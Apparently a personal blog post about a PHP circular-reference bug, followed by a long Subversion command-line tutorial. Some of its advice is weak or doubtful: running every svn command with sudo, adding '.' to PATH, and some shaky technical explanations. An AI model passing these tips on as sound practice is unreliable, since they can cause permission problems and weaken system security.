Now that we are all familiar with references, we can illustrate how they can be harmful to your application,
should you ever encounter them. If you use a circular reference in your code, you're going to encounter some
pretty interesting errors that won't lead you directly to the problem...

class Bootstrap{
    public $config;

    public function __construct(){
        $this->config =& $GLOBALS['app']->config;
    }

    public function &run(){
        return $this->config;
    }
}

class Application{
    public $config;

    public function __construct(){
        $GLOBALS['app'] =& $this; # Assign this by reference to the global application variable for easy access
        $bootstrap = new Bootstrap();
        $this->config =& $bootstrap->run(); # note the =&: we keep the reference run() returns
    }

    public function action(){
        $User  = new User();
        $login = $User->Login();
        # User passed, reward them with a cookie :)
        # Fail the user with a counter >.>
    }
}

class User{
    protected $_config;

    public function __construct(){
        $this->_config =& $GLOBALS['app']->config;
    }

    public function Login(){
        # Attempt to login the user...
    }
}
Can you spot the point of interest? About half of this code is a distraction ^_^
First, you have to imagine this project being about 10K lines of code longer, and involving much more
functionality and many more components, but this is the gist of it. Look closely at the chain of command
where the references are concerned. $GLOBALS['app'] is given a reference to the Application instance in
its constructor. The constructor then creates an instance of Bootstrap, which runs its own constructor.
In that constructor, Bootstrap stores a reference to $GLOBALS['app']->config in $this->config. Then, when
control returns to the Application constructor, it assigns, by reference, the value returned from
Bootstrap::run() into $this->config.

This is where the circular reference becomes an issue: Bootstrap::$config is a reference to
$GLOBALS['app']->config, which is a reference to Application::$config, which is now a reference to
Bootstrap::$config, which is a reference to $GLOBALS['app']->config, and so the cycle continues
endlessly. To break the chain, I removed the ampersand from Bootstrap::run(). It took me a good while to
realize this, but once I did, it stuck out like a red-hot nail that hadn't been hammered down yet.

Hope this saves someone else from hours of debugging...

Subversion Tutorial

I figured I'd put this tutorial together for those who are struggling to grasp the concept or commands in SVN. I have also had to reproduce this tutorial for more than one company, so I wanted to generalize it for anyone new to SVN.

Installing a command-line SVN client

Windows users can go to SlikSVN and install the client from there.

Linux/Mac users should first type

which svn

to see if they have subversion installed. If not, Debian-based users can type:

sudo apt-get install -y subversion

RHEL-based users can type:

sudo yum install -y subversion

Mac OS X users can use Homebrew or MacPorts to install a command-line subversion client:

brew install subversion

or

sudo port install subversion

Configure Your Subversion Client

After you have run the installation package for both subversion and gnuDiff, make sure the binaries are added to your system path.

  1. Start -> Run -> sysdm.cpl
  2. Click the "Advanced" tab in the System Properties window.
  3. Click the "Environment Variables"
  4. Another dialog box will pop up.
  5. In the System Environment variables, search for the variable called "PATH".
  6. Edit this variable. If you must, copy the content of the path variable to a text editor.
    • HINT: To make things easier to read, replace all ";" with "\n" and each path will have its own line for editing purposes. This of course only applies if your text editor supports escape sequences.
  7. Ensure that this path variable contains the contents of where you installed SlikSVN. For example, if you installed to C:\Program Files\SlikSVN\, then make sure C:\Program Files\SlikSVN\bin is in the PATH variable.
  8. Copy the contents of this and replace it back into the system variable box.
  9. Click "ok" to set the new PATH variable.
SVN also uses another environment variable when committing changes. If a variable named "SVN_EDITOR" does not exist, create it.

For Windows users, you can set it to either "EDIT" or "NOTEPAD", whichever you prefer.

WARNING: Notepad++ handles files in a funny way: it closes the file stream after the file has been opened. For this reason, it is not recommended to use Notepad++ as your text editor in conjunction with SVN.
Click ok, ok, ok ^ 3000. If you had a CMD open, close it, then re-open it to get the new environment variables.

For Linux/Mac users, edit your ~/.bashrc file to set this variable when you start your console. You can set it to your favorite text editor, such as kwrite, gedit, bluefish, quanta, leafpad, vi, vim, or even nano. Add this to the end of the file:

export SVN_EDITOR=[YOUR_EDITOR]
export PATH=$PATH:.:[SVN_PATH]
  • Replace [YOUR_EDITOR] with your editor of choice.
  • Replace [SVN_PATH] with the directory containing your SVN executable.
  • The PATH line applies only if that directory is not already in your path.
If you are still having issues with the text editor after trying out SVN, try setting the EDITOR variable to the absolute path of your chosen editor. If you don't know the absolute path, you can always use this:
export EDITOR=`which [YOUR_EDITOR]`;

EDIT is a command-line based editor and has no .exe, so you shouldn't have issues with this.

From here you should be able to run

svn help

in the command line. Documentation is included in the package. This should be good enough to get you started, but I'm going to delve a little further into this SVN stuff for good reference ^_^

NOTE: If any of these commands do not work (e.g. you get "svn: Can't open file '.svn/lock': Permission denied"), your best bet is to ensure you have read/write access to the .svn directories in the project folder. Alternately, you can add "sudo" before every svn command. Sudo invokes root privileges for a user or command for a short period of time and is considered a much more secure alternative to su. For sudo to work, you must be listed in the /etc/sudoers file as defined by its configuration. For more information on sudo, please see the documentation:

man sudo

General Help

Please note that I have omitted a few things from this tutorial for simplicity. Please see the svn man page (http://linux.die.net/man/1/svn) or type:
svn [command] --help

for more information.

Checking out a Repository

svn checkout [URL] [Path] [-r [Revision]]

or

svn co [URL] [Path] [-r [Revision]]


URL- Required. The URL of the location of the checkout (e.g. svn://example.com/myProject/trunk)
Path- Optional. The local path where the subversion is checked out. If this path is omitted, it will create a directory in your current working directory named after the base directory of the SVN checkout (e.g. will create ./trunk)
Revision- Optional. The number of the revision you wish to checkout. Defaults to the most recent revision.
Once you run this command and the directory is created, your subversion working copy is set up and you are ready to work on your project. Be warned, however: upon checking out your first copy, a directory called ".svn" will be created in each directory that is in the repository. These .svn folders keep metadata about your working copy. Alter one of those files, and you're likely to break your working copy. If this happens, you will have to check out a fresh copy of the most recent revision and re-do your changes.

Also please note: if you do break your working copy this way (accidentally or otherwise), try not to copy directories in their entirety from the fresh checkout. Only copy files individually, or open the files and edit them manually, for copying a directory wholesale (with its .svn folder) will only break the working copy again... (a lesson learned the hard way by yours sincerely, J).
To take a working copy out of subversion control, you can execute the following command on *nix-based systems:

find [dir] -type d -name .svn -prune -exec rm -Rf {} \;

Where "[dir]" is the location you want to remove from version control.

svn co --help
for more info.

Committing a Project

svn commit [-F [File]] [--force-log] [-m [message]]

or

svn ci [-F [File]] [--force-log] [-m [message]]

Optional Parameters:
-F- Optional. Attach a log file.
File- The location of the log message
--force-log- Optional. Forces SVN to recognize the parameter for -F to be a log file
-m- Optional. Attach a message.
message- The message to be sent
If -F and -m are omitted, SVN will launch the editor named in the environment variable "SVN_EDITOR" so you can write a log message to attach to this commit. Therefore, if you keep a local CHANGELOG file on your development server, you can easily track the changes you've made to the site while skipping the tedious task of remembering what you changed.

Running this command will commit your latest changes to the repository.
svn ci --help
for more info.

Viewing A Revision's Log

svn log

This is a handy tool that allows you to see all your changes over the course of the project. It prints the entire log of all the changes that have been made on the project, which is the reason why it is strongly recommended that you remove the contents of your CHANGELOG after every commit.
svn log --help
for more info.

Updating A Revision

svn update

or

svn up

This will bring your current working copy up to the most recent revision. If any conflicts are discovered during this update (e.g. you have a file more recent than the repository's), SVN will prompt you as to what you want to do.
Options for reference are as follows:
(e) Edit- Edit the current file to resolve the conflicts. Launches %SVN_EDITOR% or $SVN_EDITOR.
(r) Resolved- Available after selecting the "e" option. After you've edited and saved your changes, you can mark them "resolved", meaning your saved temp file becomes your local copy of the file in question.
(df) Diff-Full- Runs "diff" on the local working copy against the repository's copy.
(mf) Mine-Full- Drops the repository's changes and keeps your local copy of the file in question.
(tf) Theirs-Full- Drops all your local changes and overwrites the file with the repository's copy.
(h) Help- Get more info on the available commands.
svn up --help
for more info.

Resolving Conflicts

When you find conflicts, you will have the option to edit the files, find the differences, and resolve them. You will find globs of text that follow a format similar to this:

--- old 2011-04-25 13:39:37.000000000 -0400
+++ new 2011-04-25 13:40:01.000000000 -0400
@@ -3,8 +3,8 @@
auctor, dui in hendrerit ultricies, est enim faucibus dui, sit amet lobortis orci ligula sed orci.
Maecenas dictum bibendum nisl, vel mattis nulla pretium id. Praesent dignissim convallis tellus, vel
bibendum tellus euismod a. Mauris tincidunt ipsum magna. Quisque sodales convallis dictum. Etiam eu

-ante velit. Donec sed magna nisi, in tincidunt ipsum. Class aptent taciti sociosqu ad litora
-torquent per conubia nostra, per inceptos himenaeos. Ut lectus arcu, feugiat at laoreet ac,

+ante latin. Donec sed magna nisi, in tincidunt ipsum. Class aptent taciti sociosqu ad litora
+torquent per conubia ora nostra, per inceptos himenaeos. Ut lectus arcu, feugiat at laoreet ac,

dignissim vel elit. In posuere massa vel metus suscipit euismod. Sed eget purus lacus, vel accumsan
dui. Sed ut nisl eget dui blandit molestie nec gravida ligula. Duis et pulvinar justo. In eu enim
sit amet nulla accumsan vestibulum non at sapien. Integer viverra cursus odio. Suspendisse placerat

In this output, lines prefixed with "-" come from the old revision and lines prefixed with "+" come from the new one; the @@ header gives the line ranges of the changed hunk.

Reverting Changes

svn revert

If an update gives you trouble, this command may come in handy in a pinch. It will discard your local modifications and restore your working copy to the pristine state of the last revision you checked out or updated to.
svn revert --help
for more info.

Adding Files

svn add [File]
svn add [File1] [File2] [File3] ...
This command will schedule files for addition to the subversion repository; they are added when you next commit.
svn add --help
for more info.

Removing Files

svn remove [File] [--keep-local]
svn delete [File]
svn rm [File]

If --keep-local is used, svn will keep the local copy of the file in question and only remove it from the repository and from version control. Otherwise, both the local copy and the repository's copy are deleted.
svn rm --help
for more info.

File Status

svn status

If you make changes to the local working copy and you lose track of which files were changed, this handy little command will tell you the status of every file in the local working copy. The prefix before each file indicates its current status.
svn status --help
for more info.

SVN Properties

We're gonna throw a curve into the mix, because it has been requested so many times and I find this feature of SVN to be so darn useful. SVN has these things called properties, which can be set on directories and files. Some properties are set automatically, while others must be set manually. Each property has its own features and rules; however, I'll only explain the two most frequently used here. That should be enough to get the general concept so you can reference the documentation and easily pick up the syntax for the other properties.


SVN:Ignore

svn propset svn:ignore [-F file] [Directory]
This will tell SVN to ignore files and folders in the specified directory based on the rules defined in the contents of the file. Explanations are best with an example...
Let's assume you have the following directory structure (a Zend Project):

├── application
│   ├── Bootstrap.php
│   ├── controllers
│   ├── models
│   ├── modules
│   ├── setup.php
│   └── views
│   └── scripts
├── cache
├── library
│   ├── App
│   └── Zend
├── public
│   └── assets
│   ├── css
│   ├── images
│   └── js
├── run
├── saveState
└── tests
└── bootstrap.php
All of these except for `run' and `saveState' are in the repository, but you're getting annoyed by the constant reminder in SVN that those files aren't under version control. You can tell SVN to ignore them by setting the svn:ignore property on the current working directory. To do this, it's best for self-documentation purposes to add a .ignore file in the current directory and put it under version control. That way, other people working on the project can see which files/directories are not under SVN control and are meant to be ignored. The .ignore file holds a newline-delimited list of files and folders to ignore, each a shell pattern. This particular project would have the following .ignore file:

run
saveState

Next, you specify this file on the command line to set the ignore property:
svn propset svn:ignore -F .ignore .
This will tell SVN to ignore files and directories in the current working directory based on the rules defined by the file. Since `run' and `saveState' are specified in the file, all files and folders with those names will be ignored, and you won't see them with the question mark in `svn stat'
NOTE: svn:ignore does not work recursively. If you try to specify files inside of directories, you will find those files are not ignored. If you want to exclude files within a directory, you'll have to set the property on that directory according to the rules of the files you want ignored. A prime example: say you want to ignore everything in the `cache' directory. Create `cache/.ignore', add it to version control, and put this in it:

*
Another Note: The .ignore files are not required. They are a convention I include in this tutorial to make things easier for other developers. It would be just as possible to deal with the properties directly, but having a file under version control makes these properties easier to manage.
That's it! Next, run this command to set the property:
svn propset svn:ignore -F cache/.ignore cache/
Next thing you know, if you run `svn stat' on cache, you find that everything that wasn't under version control is removed from the listing! This same philosophy can be used to wildcard filenames as well. For example, to ignore all .old files, add "*.old" to your .ignore file, and set the property.
svn propset --help
for more info.


SVN:Externals

Sometimes you're working on a project and you have a library of code that is maintained by someone else who also uses SVN. You want to include their library in your project, so you check out a copy of their work into your working copy. You also want everyone else who checks out a copy of your project to get this same checkout, so the library can be used. This can be accomplished with the SVN:Externals property. The syntax of SVN:Externals is a bit different from SVN:Ignore in that you must specify the URL of the repository that will be used for the external checkout. To better track where externals occur, it's best to keep a single file in the root of your project called `.externals'. The syntax of the .externals file is as follows:
[Directory] [Repo-URL]
Where [Directory] is the target local directory that will contain the checkout, and [Repo-URL] is the URL to check out. Let's say the Zend project described in the SVN:Ignore section needs the Zend library checked out into the `library' directory. Place this in your .externals file:
library/Zend    http://framework.zend.com/svn/framework/standard/trunk/library/Zend/
You can run this command to set the property:
svn propset svn:externals -F .externals .
Now when you run `svn up' in the root of the project, you will see it fetch the external repository. This is a very handy way to include externals and link your project to other repositories.


That's all I can think of for now that will prepare you for what you may encounter. If you need any further help hit me up and I'll do the best I can to help. Should I find that this could use some more detail in some places, I'll make changes accordingly.